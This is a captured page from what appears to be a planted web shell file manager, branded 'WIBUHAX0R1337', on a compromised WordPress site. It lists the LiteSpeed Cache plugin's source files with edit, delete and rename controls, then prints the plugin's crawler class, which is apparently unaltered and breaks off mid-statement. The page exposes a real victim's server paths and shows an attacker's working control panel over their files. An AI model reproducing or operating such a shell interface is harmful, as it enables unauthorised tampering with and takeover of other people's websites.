-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
xtrasolutionsco.com
/
wp-content
/
plugins
/
litespeed-cache
/
src
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
cdn
--
NONE
data_structure
--
NONE
activation.cls.php
17.437KB
Edit File
Delete File
Rename
admin-display.cls.php
48.119KB
Edit File
Delete File
Rename
admin-settings.cls.php
11.116KB
Edit File
Delete File
Rename
admin.cls.php
5.046KB
Edit File
Delete File
Rename
api.cls.php
10.437KB
Edit File
Delete File
Rename
avatar.cls.php
8.682KB
Edit File
Delete File
Rename
base.cls.php
34.58KB
Edit File
Delete File
Rename
cdn.cls.php
15.918KB
Edit File
Delete File
Rename
cloud.cls.php
65.796KB
Edit File
Delete File
Rename
conf.cls.php
19.53KB
Edit File
Delete File
Rename
control.cls.php
24.349KB
Edit File
Delete File
Rename
core.cls.php
21.015KB
Edit File
Delete File
Rename
crawler-map.cls.php
19.428KB
Edit File
Delete File
Rename
crawler.cls.php
42.195KB
Edit File
Delete File
Rename
css.cls.php
15.271KB
Edit File
Delete File
Rename
data.cls.php
16.49KB
Edit File
Delete File
Rename
data.upgrade.func.php
3.073KB
Edit File
Delete File
Rename
db-optm.cls.php
10.341KB
Edit File
Delete File
Rename
debug2.cls.php
14.17KB
Edit File
Delete File
Rename
doc.cls.php
4.066KB
Edit File
Delete File
Rename
error.cls.php
7.383KB
Edit File
Delete File
Rename
esi.cls.php
27.182KB
Edit File
Delete File
Rename
file.cls.php
10.569KB
Edit File
Delete File
Rename
gui.cls.php
36.503KB
Edit File
Delete File
Rename
htaccess.cls.php
24.002KB
Edit File
Delete File
Rename
import.cls.php
4.292KB
Edit File
Delete File
Rename
import.preset.cls.php
5.501KB
Edit File
Delete File
Rename
lang.cls.php
15.06KB
Edit File
Delete File
Rename
localization.cls.php
3.439KB
Edit File
Delete File
Rename
media.cls.php
40.368KB
Edit File
Delete File
Rename
metabox.cls.php
5.316KB
Edit File
Delete File
Rename
object-cache-wp.cls.php
24.667KB
Edit File
Delete File
Rename
object-cache.cls.php
20.301KB
Edit File
Delete File
Rename
object.lib.php
13.31KB
Edit File
Delete File
Rename
optimize.cls.php
38.663KB
Edit File
Delete File
Rename
optimizer.cls.php
9.414KB
Edit File
Delete File
Rename
placeholder.cls.php
14.187KB
Edit File
Delete File
Rename
purge.cls.php
33.95KB
Edit File
Delete File
Rename
report.cls.php
6.119KB
Edit File
Delete File
Rename
rest.cls.php
8.637KB
Edit File
Delete File
Rename
root.cls.php
13.987KB
Edit File
Delete File
Rename
router.cls.php
20.568KB
Edit File
Delete File
Rename
str.cls.php
3.15KB
Edit File
Delete File
Rename
tag.cls.php
9.259KB
Edit File
Delete File
Rename
task.cls.php
6.132KB
Edit File
Delete File
Rename
tool.cls.php
4.217KB
Edit File
Delete File
Rename
ucss.cls.php
14.374KB
Edit File
Delete File
Rename
utility.cls.php
21.763KB
Edit File
Delete File
Rename
vary.cls.php
20.201KB
Edit File
Delete File
Rename
vpi.cls.php
9.363KB
Edit File
Delete File
Rename
<?php // phpcs:ignoreFile /** * The crawler class * * @since 1.1.0 */ namespace LiteSpeed; defined('WPINC') || exit(); class Crawler extends Root { const LOG_TAG = 'πΈοΈ'; const TYPE_REFRESH_MAP = 'refresh_map'; const TYPE_EMPTY = 'empty'; const TYPE_BLACKLIST_EMPTY = 'blacklist_empty'; const TYPE_BLACKLIST_DEL = 'blacklist_del'; const TYPE_BLACKLIST_ADD = 'blacklist_add'; const TYPE_START = 'start'; const TYPE_RESET = 'reset'; const USER_AGENT = 'lscache_walker'; const FAST_USER_AGENT = 'lscache_runner'; const CHUNKS = 10000; const STATUS_WAIT = 'W'; const STATUS_HIT = 'H'; const STATUS_MISS = 'M'; const STATUS_BLACKLIST = 'B'; const STATUS_NOCACHE = 'N'; private $_sitemeta = 'meta.data'; private $_resetfile; private $_end_reason; private $_ncpu = 1; private $_server_ip; private $_crawler_conf = array( 'cookies' => array(), 'headers' => array(), 'ua' => '', ); private $_crawlers = array(); private $_cur_threads = -1; private $_max_run_time; private $_cur_thread_time; private $_map_status_list = array( 'H' => array(), 'M' => array(), 'B' => array(), 'N' => array(), ); protected $_summary; /** * Initialize crawler, assign sitemap path * * @since 1.1.0 */ public function __construct() { if (is_multisite()) { $this->_sitemeta = 'meta' . get_current_blog_id() . '.data'; } $this->_resetfile = LITESPEED_STATIC_DIR . '/crawler/' . $this->_sitemeta . '.reset'; $this->_summary = self::get_summary(); $this->_ncpu = $this->_get_server_cpu(); $this->_server_ip = $this->conf(Base::O_SERVER_IP); self::debug('Init w/ CPU cores=' . $this->_ncpu); } /** * Try get server CPUs * * @since 5.2 */ private function _get_server_cpu() { $cpuinfo_file = '/proc/cpuinfo'; $setting_open_dir = ini_get('open_basedir'); if ($setting_open_dir) { return 1; } // Server has limit try { if (!@is_file($cpuinfo_file)) { return 1; } } catch (\Exception $e) { return 1; } $cpuinfo = file_get_contents($cpuinfo_file); preg_match_all('/^processor/m', $cpuinfo, $matches); return count($matches[0]) ?: 1; } /** * Check whether the current crawler is active/runable/useable/enabled/want it to work or not * * @since 4.3 */ public function is_active( $curr ) { $bypass_list = self::get_option('bypass_list', array()); return !in_array($curr, $bypass_list); } /** * Toggle the current crawler's activeness state, i.e., runable/useable/enabled/want it to work or not, and return the updated state * * @since 4.3 */ public function toggle_activeness( $curr ) { // param type: int $bypass_list = self::get_option('bypass_list', array()); if (in_array($curr, $bypass_list)) { // when the ith opt was off / in the bypassed list, turn it on / remove it from the list unset($bypass_list[array_search($curr, $bypass_list)]); $bypass_list = array_values($bypass_list); self::update_option('bypass_list', $bypass_list); return true; } else { // when the ith opt was on / not in the bypassed list, turn it off / add it to the list $bypass_list[] = (int) $curr; self::update_option('bypass_list', $bypass_list); return false; } } /** * Clear bypassed list * * @since 4.3 * @access public */ public function clear_disabled_list() { self::update_option('bypass_list', array()); $msg = __('Crawler disabled list is cleared! All crawlers are set to active! ', 'litespeed-cache'); Admin_Display::note($msg); self::debug('All crawlers are set to active...... '); } /** * Overwrite get_summary to init elements * * @since 3.0 * @access public */ public static function get_summary( $field = false ) { $_default = array( 'list_size' => 0, 'last_update_time' => 0, 'curr_crawler' => 0, 'curr_crawler_beginning_time' => 0, 'last_pos' => 0, 'last_count' => 0, 'last_crawled' => 0, 'last_start_time' => 0, 'last_status' => '', 'is_running' => 0, 'end_reason' => '', 'meta_save_time' => 0, 'pos_reset_check' => 0, 'done' => 0, 'this_full_beginning_time' => 0, 'last_full_time_cost' => 0, 'last_crawler_total_cost' => 0, 'crawler_stats' => array(), // this will store all crawlers hit/miss crawl status ); wp_cache_delete('alloptions', 'options'); // ensure the summary is current $summary = parent::get_summary(); $summary = array_merge($_default, $summary); if (!$field) { return $summary; } if (array_key_exists($field, $summary)) { return $summary[$field]; } return null; } /** * Overwrite save_summary * * @since 3.0 * @access public */ public static function save_summary( $data = false, $reload = false, $overwrite = false ) { $instance = self::cls(); $instance->_summary['meta_save_time'] = time(); if (!$data) { $data = $instance->_summary; } parent::save_summary($data, $reload, $overwrite); File::save(LITESPEED_STATIC_DIR . '/crawler/' . $instance->_sitemeta, \json_encode($data), true); } /** * Cron start async crawling * * @since 5.5 */ public static function start_async_cron() { Task::async_call('crawler'); } /** * Manually start async crawling * * @since 5.5 */ public static function start_async() { Task::async_call('crawler_force'); $msg = __('Started async crawling', 'litespeed-cache'); Admin_Display::success($msg); } /** * Ajax crawl handler * * @since 5.5 */ public static function async_handler( $manually_run = false ) { self::debug('------------async-------------start_async_handler'); // check_ajax_referer('async_crawler', 'nonce'); self::start($manually_run); } /** * Proceed crawling * * @since 1.1.0 * @access public */ public static function start( $manually_run = false ) { if (!Router::can_crawl()) { self::debug('......crawler is NOT allowed by the server admin......'); return false; } if ($manually_run) { self::debug('......crawler manually ran......'); } self::cls()->_crawl_data($manually_run); } /** * Crawling start * * @since 1.1.0 * @access private */ private function _crawl_data( $manually_run ) { if (!defined('LITESPEED_LANE_HASH')) { define('LITESPEED_LANE_HASH', Str::rrand(8)); } if ($this->_check_valid_lane()) { $this->_take_over_lane(); } else { self::debug('β οΈ lane in use'); return; // if ($manually_run) { // self::debug('......crawler started (manually_rund)......'); // Log pid to prevent from multi running // if (defined('LITESPEED_CLI')) { // Take over lane // self::debug('β οΈβ οΈβ οΈ Forced take over lane (CLI)'); // $this->_take_over_lane(); // } // } } self::debug('......crawler started......'); // for the first time running if (!$this->_summary || !Data::cls()->tb_exist('crawler') || !Data::cls()->tb_exist('crawler_blacklist')) { $this->cls('Crawler_Map')->gen(); } // if finished last time, regenerate sitemap if ($this->_summary['done'] === 'touchedEnd') { // check whole crawling interval $last_finished_at = $this->_summary['last_full_time_cost'] + $this->_summary['this_full_beginning_time']; if (!$manually_run && time() - $last_finished_at < $this->conf(Base::O_CRAWLER_CRAWL_INTERVAL)) { self::debug('Cron abort: cache warmed already.'); // if not reach whole crawling interval, exit $this->Release_lane(); return; } self::debug('TouchedEnd. regenerate sitemap....'); $this->cls('Crawler_Map')->gen(); } $this->list_crawlers(); // Skip the crawlers that in bypassed list while (!$this->is_active($this->_summary['curr_crawler']) && $this->_summary['curr_crawler'] < count($this->_crawlers)) { self::debug('Skipped the Crawler #' . $this->_summary['curr_crawler'] . ' ......'); ++$this->_summary['curr_crawler']; } if ($this->_summary['curr_crawler'] >= count($this->_crawlers)) { $this->_end_reason = 'end'; $this->_terminate_running(); $this->Release_lane(); return; } // In case crawlers are all done but not reload, reload it if (empty($this->_summary['curr_crawler']) || empty($this->_crawlers[$this->_summary['curr_crawler']])) { $this->_summary['curr_crawler'] = 0; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); } $res = $this->load_conf(); if (!$res) { self::debug('Load conf failed'); $this->_terminate_running(); $this->Release_lane(); return; } try { $this->_engine_start(); $this->Release_lane(); } catch (\Exception $e) { self::debug('π ' . $e->getMessage()); } } /** * Load conf before running crawler * * @since 3.0 * @access private */ private function load_conf() { $this->_crawler_conf['base'] = site_url(); $current_crawler = $this->_crawlers[$this->_summary['curr_crawler']]; /** * Check cookie crawler * * @since 2.8 */ foreach ($current_crawler as $k => $v) { if (strpos($k, 'cookie:') !== 0) { continue; } if ($v == '_null') { continue; } $this->_crawler_conf['cookies'][substr($k, 7)] = $v; } /** * Set WebP simulation * * @since 1.9.1 */ if (!empty($current_crawler['webp'])) { $this->_crawler_conf['headers'][] = 'Accept: image/' . ($this->conf(Base::O_IMG_OPTM_WEBP) == 2 ? 'avif' : 'webp') . ',*/*'; } /** * Set mobile crawler * * @since 2.8 */ if (!empty($current_crawler['mobile'])) { $this->_crawler_conf['ua'] = 'Mobile iPhone'; } /** * Limit delay to use server setting * * @since 1.8.3 */ $this->_crawler_conf['run_delay'] = 500; // microseconds if (defined('LITESPEED_CRAWLER_USLEEP') && constant('LITESPEED_CRAWLER_USLEEP') > $this->_crawler_conf['run_delay']) { $this->_crawler_conf['run_delay'] = constant('LITESPEED_CRAWLER_USLEEP'); } if (!empty($_SERVER[Base::ENV_CRAWLER_USLEEP]) && $_SERVER[Base::ENV_CRAWLER_USLEEP] > $this->_crawler_conf['run_delay']) { $this->_crawler_conf['run_delay'] = $_SERVER[Base::ENV_CRAWLER_USLEEP]; } $this->_crawler_conf['run_duration'] = $this->get_crawler_duration(); $this->_crawler_conf['load_limit'] = $this->conf(Base::O_CRAWLER_LOAD_LIMIT); if (!empty($_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT_ENFORCE])) { $this->_crawler_conf['load_limit'] = $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT_ENFORCE]; } elseif (!empty($_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT]) && $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT] < $this->_crawler_conf['load_limit']) { $this->_crawler_conf['load_limit'] = $_SERVER[Base::ENV_CRAWLER_LOAD_LIMIT]; } if ($this->_crawler_conf['load_limit'] == 0) { self::debug('π Terminated crawler due to load limit set to 0'); return false; } /** * Set role simulation * * @since 1.9.1 */ if (!empty($current_crawler['uid'])) { if (!$this->_server_ip) { self::debug('π Terminated crawler due to Server IP not set'); return false; } // Get role simulation vary name $vary_name = $this->cls('Vary')->get_vary_name(); $vary_val = $this->cls('Vary')->finalize_default_vary($current_crawler['uid']); $this->_crawler_conf['cookies'][$vary_name] = $vary_val; $this->_crawler_conf['cookies']['litespeed_hash'] = Router::cls()->get_hash($current_crawler['uid']); } return true; } /** * Get crawler duration allowance * * @since 7.0 */ public function get_crawler_duration() { $RUN_DURATION = defined('LITESPEED_CRAWLER_DURATION') ? constant('LITESPEED_CRAWLER_DURATION') : 900; if ($RUN_DURATION > 900) { $RUN_DURATION = 900; // reset to default value if defined in conf file is higher than 900 seconds for security enhancement } return $RUN_DURATION; } /** * Start crawler * * @since 1.1.0 * @access private */ private function _engine_start() { // check if is running // if ($this->_summary['is_running'] && time() - $this->_summary['is_running'] < $this->_crawler_conf['run_duration']) { // $this->_end_reason = 'stopped'; // self::debug('The crawler is running.'); // return; // } // check current load $this->_adjust_current_threads(); if ($this->_cur_threads == 0) { $this->_end_reason = 'stopped_highload'; self::debug('Stopped due to heavy load.'); return; } // log started time self::save_summary(array( 'last_start_time' => time() )); // set time limit $maxTime = (int) ini_get('max_execution_time'); self::debug('ini_get max_execution_time=' . $maxTime); if ($maxTime == 0) { $maxTime = 300; // hardlimit } else { $maxTime -= 5; } if ($maxTime >= $this->_crawler_conf['run_duration']) { $maxTime = $this->_crawler_conf['run_duration']; self::debug('Use run_duration setting as max_execution_time=' . $maxTime); } elseif (ini_set('max_execution_time', $this->_crawler_conf['run_duration'] + 15) !== false) { $maxTime = $this->_crawler_conf['run_duration']; self::debug('ini_set max_execution_time=' . $maxTime); } self::debug('final max_execution_time=' . $maxTime); $this->_max_run_time = $maxTime + time(); // mark running $this->_prepare_running(); // run crawler $this->_do_running(); $this->_terminate_running(); } /** * Get server load * * @since 5.5 */ public function get_server_load() { /** * If server is windows, exit * * @see https://wordpress.org/support/topic/crawler-keeps-causing-crashes/ */ if (!function_exists('sys_getloadavg')) { return -1; } $curload = sys_getloadavg(); $curload = $curload[0]; self::debug('Server load: ' . $curload); return $curload; } /** * Adjust threads dynamically * * @since 1.1.0 * @access private */ private function _adjust_current_threads() { $curload = $this->get_server_load(); if ($curload == -1) { self::debug('set threads=0 due to func sys_getloadavg not exist!'); $this->_cur_threads = 0; return; } $curload /= $this->_ncpu; // $curload = 1; $CRAWLER_THREADS = defined('LITESPEED_CRAWLER_THREADS') ? constant('LITESPEED_CRAWLER_THREADS') : 3; if ($this->_cur_threads == -1) { // init if ($curload > $this->_crawler_conf['load_limit']) { $curthreads = 0; } elseif ($curload >= $this->_crawler_conf['load_limit'] - 1) { $curthreads = 1; } else { $curthreads = intval($this->_crawler_conf['load_limit'] - $curload); if ($curthreads > $CRAWLER_THREADS) { $curthreads = $CRAWLER_THREADS; } } } else { // adjust $curthreads = $this->_cur_threads; if ($curload >= $this->_crawler_conf['load_limit'] + 1) { sleep(5); // sleep 5 secs if ($curthreads >= 1) { --$curthreads; } } elseif ($curload >= $this->_crawler_conf['load_limit']) { // if ( $curthreads > 1 ) {// if already 1, keep --$curthreads; // } } elseif ($curload + 1 < $this->_crawler_conf['load_limit']) { if ($curthreads < $CRAWLER_THREADS) { ++$curthreads; } } } // $log = 'set current threads = ' . $curthreads . ' previous=' . $this->_cur_threads // . ' max_allowed=' . $CRAWLER_THREADS . ' load_limit=' . $this->_crawler_conf[ 'load_limit' ] . ' current_load=' . $curload; $this->_cur_threads = $curthreads; $this->_cur_thread_time = time(); } /** * Mark running status * * @since 1.1.0 * @access private */ private function _prepare_running() { $this->_summary['is_running'] = time(); $this->_summary['done'] = 0; // reset done status $this->_summary['last_status'] = 'prepare running'; $this->_summary['last_crawled'] = 0; // Current crawler starttime mark if ($this->_summary['last_pos'] == 0) { $this->_summary['curr_crawler_beginning_time'] = time(); } if ($this->_summary['curr_crawler'] == 0 && $this->_summary['last_pos'] == 0) { $this->_summary['this_full_beginning_time'] = time(); $this->_summary['list_size'] = $this->cls('Crawler_Map')->count_map(); } if ($this->_summary['end_reason'] == 'end' && $this->_summary['last_pos'] == 0) { $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); } self::save_summary(); } /** * Take over lane * * @since 6.1 */ private function _take_over_lane() { self::debug('Take over lane as lane is free: ' . $this->json_local_path() . '.pid'); File::save($this->json_local_path() . '.pid', LITESPEED_LANE_HASH); } /** * Update lane file * * @since 6.1 */ private function _touch_lane() { touch($this->json_local_path() . '.pid'); } /** * Release lane file * * @since 6.1 */ public function Release_lane() { $lane_file = $this->json_local_path() . '.pid'; if (!file_exists($lane_file)) { return; } self::debug('Release lane'); unlink($lane_file); } /** * Check if lane is used by other crawlers * * @since 6.1 */ private function _check_valid_lane( $strict_mode = false ) { // Check lane hash $lane_file = $this->json_local_path() . '.pid'; if ($strict_mode) { if (!file_exists($lane_file)) { self::debug("lane file not existed, strict mode is false [file] $lane_file"); return false; } } $pid = File::read($lane_file); if ($pid && LITESPEED_LANE_HASH != $pid) { // If lane file is older than 1h, ignore if (time() - filemtime($lane_file) > 3600) { self::debug('Lane file is older than 1h, releasing lane'); $this->Release_lane(); return true; } return false; } return true; } /** * Test port for simulator * * @since 7.0 * @access private * @return bool true if success and can continue crawling, false if failed and need to stop */ private function _test_port() { if (!$this->_server_ip) { if (empty($this->_crawlers[$this->_summary['curr_crawler']]['uid'])) { self::debug('Bypass test port as Server IP is not set'); return true; } self::debug('β Server IP not set'); return false; } if (defined('LITESPEED_CRAWLER_LOCAL_PORT')) { self::debug('β LITESPEED_CRAWLER_LOCAL_PORT already defined'); return true; } // Don't repeat testing in 120s if (!empty($this->_summary['test_port_tts']) && time() - $this->_summary['test_port_tts'] < 120) { if (!empty($this->_summary['test_port'])) { self::debug('β Use tested local port: ' . $this->_summary['test_port']); define('LITESPEED_CRAWLER_LOCAL_PORT', $this->_summary['test_port']); return true; } return false; } $this->_summary['test_port_tts'] = time(); self::save_summary(); $options = $this->_get_curl_options(); $home = home_url(); File::save(LITESPEED_STATIC_DIR . '/crawler/test_port.html', $home, true); $url = LITESPEED_STATIC_URL . '/crawler/test_port.html'; $parsed_url = parse_url($url); if (empty($parsed_url['host'])) { self::debug('β Test port failed, invalid URL: ' . $url); return false; } $resolved = $parsed_url['host'] . ':443:' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false; $options[CURLOPT_HEADER] = false; self::debug('Test local 443 port for ' . $resolved); $ch = curl_init(); curl_setopt_array($ch, $options); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); $test_result = false; if (curl_errno($ch) || $result !== $home) { if (curl_errno($ch)) { self::debug('β Test port curl error: [errNo] ' . curl_errno($ch) . ' [err] ' . curl_error($ch)); } elseif ($result !== $home) { self::debug('β Test port response is wrong: ' . $result); } self::debug('β Test local 443 port failed, try port 80'); // Try port 80 $resolved = $parsed_url['host'] . ':80:' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $url = str_replace('https://', 'http://', $url); if (!in_array('X-Forwarded-Proto: https', $options[CURLOPT_HTTPHEADER])) { $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-Proto: https'; } // $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-SSL: on'; $ch = curl_init(); curl_setopt_array($ch, $options); curl_setopt($ch, CURLOPT_URL, $url); $result = curl_exec($ch); if (curl_errno($ch)) { self::debug('β Test port curl error: [errNo] ' . curl_errno($ch) . ' [err] ' . curl_error($ch)); } elseif ($result !== $home) { self::debug('β Test port response is wrong: ' . $result); } else { self::debug('β Test local 80 port successfully'); define('LITESPEED_CRAWLER_LOCAL_PORT', 80); $this->_summary['test_port'] = 80; $test_result = true; } // self::debug('Response data: ' . $result); // $this->Release_lane(); // exit($result); } else { self::debug('β Tested local 443 port successfully'); define('LITESPEED_CRAWLER_LOCAL_PORT', 443); $this->_summary['test_port'] = 443; $test_result = true; } self::save_summary(); curl_close($ch); return $test_result; } /** * Run crawler * * @since 1.1.0 * @access private */ private function _do_running() { $options = $this->_get_curl_options(true); // If is role simulator and not defined local port, check port once $test_result = $this->_test_port(); if (!$test_result) { $this->_end_reason = 'port_test_failed'; self::debug('β Test port failed, crawler stopped.'); return; } while ($urlChunks = $this->cls('Crawler_Map')->list_map(self::CHUNKS, $this->_summary['last_pos'])) { // self::debug('$urlChunks=' . count($urlChunks) . ' $this->_cur_threads=' . $this->_cur_threads); // start crawling $urlChunks = array_chunk($urlChunks, $this->_cur_threads); // self::debug('$urlChunks after array_chunk: ' . count($urlChunks)); foreach ($urlChunks as $rows) { if (!$this->_check_valid_lane(true)) { $this->_end_reason = 'lane_invalid'; self::debug('π The crawler lane is used by newer crawler.'); throw new \Exception('invalid crawler lane'); } // Update time $this->_touch_lane(); // self::debug('chunk fetching count($rows)= ' . count($rows)); // multi curl $rets = $this->_multi_request($rows, $options); // check result headers foreach ($rows as $row) { // self::debug('chunk fetching 553'); if (empty($rets[$row['id']])) { // If already in blacklist, no curl happened, no corresponding record continue; } // self::debug('chunk fetching 557'); // check response if ($rets[$row['id']]['code'] == 428) { // HTTP/1.1 428 Precondition Required (need to test) $this->_end_reason = 'crawler_disabled'; self::debug('crawler_disabled'); return; } $status = $this->_status_parse($rets[$row['id']]['header'], $rets[$row['id']]['code'], $row['url']); // B or H or M or N(nocache) self::debug('[status] ' . $this->_status2title($status) . "\t\t [url] " . $row['url']); $this->_map_status_list[$status][$row['id']] = array( 'url' => $row['url'], 'code' => $rets[$row['id']]['code'], // 201 or 200 or 404 ); if (empty($this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status])) { $this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status] = 0; } ++$this->_summary['crawler_stats'][$this->_summary['curr_crawler']][$status]; } // update offset position $_time = time(); $this->_summary['last_count'] = count($rows); $this->_summary['last_pos'] += $this->_summary['last_count']; $this->_summary['last_crawled'] += $this->_summary['last_count']; $this->_summary['last_update_time'] = $_time; $this->_summary['last_status'] = 'updated position'; // self::debug("chunk fetching 604 last_pos:{$this->_summary['last_pos']} last_count:{$this->_summary['last_count']} last_crawled:{$this->_summary['last_crawled']}"); // check duration if ($this->_summary['last_update_time'] > $this->_max_run_time) { $this->_end_reason = 'stopped_maxtime'; self::debug('Terminated due to maxtime'); return; // return __('Stopped due to exceeding defined Maximum Run Time', 'litespeed-cache'); } // make sure at least each 10s save meta & map status once if ($_time - $this->_summary['meta_save_time'] > 10) { $this->_map_status_list = $this->cls('Crawler_Map')->save_map_status($this->_map_status_list, $this->_summary['curr_crawler']); self::save_summary(); } // self::debug('chunk fetching 597'); // check if need to reset pos each 5s if ($_time > $this->_summary['pos_reset_check']) { $this->_summary['pos_reset_check'] = $_time + 5; if (file_exists($this->_resetfile) && unlink($this->_resetfile)) { self::debug('Terminated due to reset file'); $this->_summary['last_pos'] = 0; $this->_summary['curr_crawler'] = 0; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']] = array(); // reset done status $this->_summary['done'] = 0; $this->_summary['this_full_beginning_time'] = 0; $this->_end_reason = 'stopped_reset'; return; // return __('Stopped due to reset meta position', 'litespeed-cache'); } } // self::debug('chunk fetching 615'); // check loads if ($this->_summary['last_update_time'] - $this->_cur_thread_time > 60) { $this->_adjust_current_threads(); if ($this->_cur_threads == 0) { $this->_end_reason = 'stopped_highload'; self::debug('π Terminated due to highload'); return; // return __('Stopped due to load over limit', 'litespeed-cache'); } } $this->_summary['last_status'] = 'sleeping ' . $this->_crawler_conf['run_delay'] . 'ms'; usleep($this->_crawler_conf['run_delay']); } // self::debug('chunk fetching done'); } // All URLs are done for current crawler $this->_end_reason = 'end'; $this->_summary['crawler_stats'][$this->_summary['curr_crawler']]['W'] = 0; self::debug('Crawler #' . $this->_summary['curr_crawler'] . ' touched end'); } /** * If need to resolve DNS or not * * @since 7.3.0.1 */ private function _should_force_resolve_dns() { if ($this->_server_ip) { return true; } if (!empty($this->_crawler_conf['cookies']) && !empty($this->_crawler_conf['cookies']['litespeed_hash'])) { return true; } return false; } /** * Send multi curl requests * If res=B, bypass request and won't return * * @since 1.1.0 * @access private */ private function _multi_request( $rows, $options ) { if (!function_exists('curl_multi_init')) { exit('curl_multi_init disabled'); } $mh = curl_multi_init(); $CRAWLER_DROP_DOMAIN = defined('LITESPEED_CRAWLER_DROP_DOMAIN') ? constant('LITESPEED_CRAWLER_DROP_DOMAIN') : false; $curls = array(); foreach ($rows as $row) { if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_BLACKLIST) { continue; } if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_NOCACHE) { continue; } if (!function_exists('curl_init')) { exit('curl_init disabled'); } $curls[$row['id']] = curl_init(); // Append URL $url = $row['url']; if ($CRAWLER_DROP_DOMAIN) { $url = $this->_crawler_conf['base'] . $row['url']; } // IP resolve if ($this->_should_force_resolve_dns()) { $parsed_url = parse_url($url); // self::debug('Crawl role simulator, required to use localhost for resolve'); if (!empty($parsed_url['host'])) { $dom = $parsed_url['host']; $port = defined('LITESPEED_CRAWLER_LOCAL_PORT') ? LITESPEED_CRAWLER_LOCAL_PORT : '443'; $resolved = $dom . ':' . $port . ':' . $this->_server_ip; $options[CURLOPT_RESOLVE] = array( $resolved ); $options[CURLOPT_DNS_USE_GLOBAL_CACHE] = false; // $options[CURLOPT_PORT] = $port; if ($port == 80) { $url = str_replace('https://', 'http://', $url); if (!in_array('X-Forwarded-Proto: https', $options[CURLOPT_HTTPHEADER])) { $options[CURLOPT_HTTPHEADER][] = 'X-Forwarded-Proto: https'; } } self::debug('Resolved DNS for ' . $resolved); } } curl_setopt($curls[$row['id']], CURLOPT_URL, $url); self::debug('Crawling [url] ' . $url . ($url == $row['url'] ? '' : ' [ori] ' . $row['url'])); curl_setopt_array($curls[$row['id']], $options); curl_multi_add_handle($mh, $curls[$row['id']]); } // execute curl if ($curls) { do { $status = curl_multi_exec($mh, $active); if ($active) { curl_multi_select($mh); } } while ($active && $status == CURLM_OK); } // curl done $ret = array(); foreach ($rows as $row) { if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_BLACKLIST) { continue; } if (substr($row['res'], $this->_summary['curr_crawler'], 1) == self::STATUS_NOCACHE) { continue; } // self::debug('-----debug3'); $ch = $curls[$row['id']]; // Parse header $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $content = curl_multi_getcontent($ch); $header = substr($content, 0, $header_size); $ret[$row['id']] = array( 'header' => $header, 'code' => curl_getinfo($ch, CURLINFO_HTTP_CODE), ); // self::debug('-----debug4'); curl_multi_remove_handle($mh, $ch); curl_close($ch); } // self::debug('-----debug5'); curl_multi_close($mh); // self::debug('-----debug6'); return $ret; } /** * Translate the status to title * * @since 6.0 */ private function _status2title( $status ) { if ($status == self::STATUS_HIT) { return 'β Hit'; } if ($status == self::STATUS_MISS) { return 'π Miss'; } if ($status == self::STATUS_BLACKLIST) { return 'π Blacklisted'; } if ($status == self::STATUS_NOCACHE) { return 'π Blacklisted'; } return 'πΈ Unknown'; } /** * Check returned curl header to find if cached or not * * @since 2.0 * @access private */ private function _status_parse( $header, $code, $url ) { // self::debug('http status code: ' . $code . ' [headers]', $header); if ($code == 201) { return self::STATUS_HIT; } if (stripos($header, 'X-Litespeed-Cache-Control: no-cache') !== false) { // If is from DIVI, taken as miss if (defined('LITESPEED_CRAWLER_IGNORE_NONCACHEABLE') && LITESPEED_CRAWLER_IGNORE_NONCACHEABLE) { return self::STATUS_MISS; } // If blacklist is disabled if ((defined('LITESPEED_CRAWLER_DISABLE_BLOCKLIST') && constant('LITESPEED_CRAWLER_DISABLE_BLOCKLIST')) || apply_filters('litespeed_crawler_disable_blocklist', false, $url)) { return self::STATUS_MISS; } return self::STATUS_NOCACHE; // Blacklist } $_cache_headers = array( 'x-litespeed-cache', 'x-qc-cache', 'x-lsadc-cache' ); foreach ($_cache_headers as $_header) { if (stripos($header, $_header) !== false) { if (stripos($header, $_header . ': bkn') !== false) { return self::STATUS_HIT; // Hit } if (stripos($header, $_header . ': miss') !== false) { return self::STATUS_MISS; // Miss } return self::STATUS_HIT; // Hit } } // If blacklist is disabled if ((defined('LITESPEED_CRAWLER_DISABLE_BLOCKLIST') && constant('LITESPEED_CRAWLER_DISABLE_BLOCKLIST')) || apply_filters('litespeed_crawler_disable_blocklist', false, $url)) { return self::STATUS_MISS; } return self::STATUS_BLACKLIST; // Blacklist } /** * Get curl_options * * @since 1.1.0 * @access private */ private function _get_curl_options( $crawler_only = false ) { $CRAWLER_TIMEOUT = defined('LITESPEED_CRAWLER_TIMEOUT') ? constant('LITESPEED_CRAWLER_TIMEOUT') : 30; $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_CUSTOMREQUEST => 'GET', CURLOPT_FOLLOWLOCATION => false, CURLOPT_ENCODING => 'gzip', CURLOPT_CONNECTTIMEOUT => 10, CURLOPT_TIMEOUT => $CRAWLER_TIMEOUT, // Larger timeout to avoid incorrect blacklist addition #900171 CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_NOBODY => false, CURLOPT_HTTPHEADER => $this->_crawler_conf['headers'], ); $options[CURLOPT_HTTPHEADER][] = 'Cache-Control: max-age=0'; /** * Try to enable http2 connection (only available since PHP7+) * * @since 1.9.1 * @since 2.2.7 Commented due to cause no-cache issue * @since 2.9.1+ Fixed wrongly usage of CURL_HTTP_VERSION_1_1 const */ $options[CURLOPT_HTTP_VERSION] = 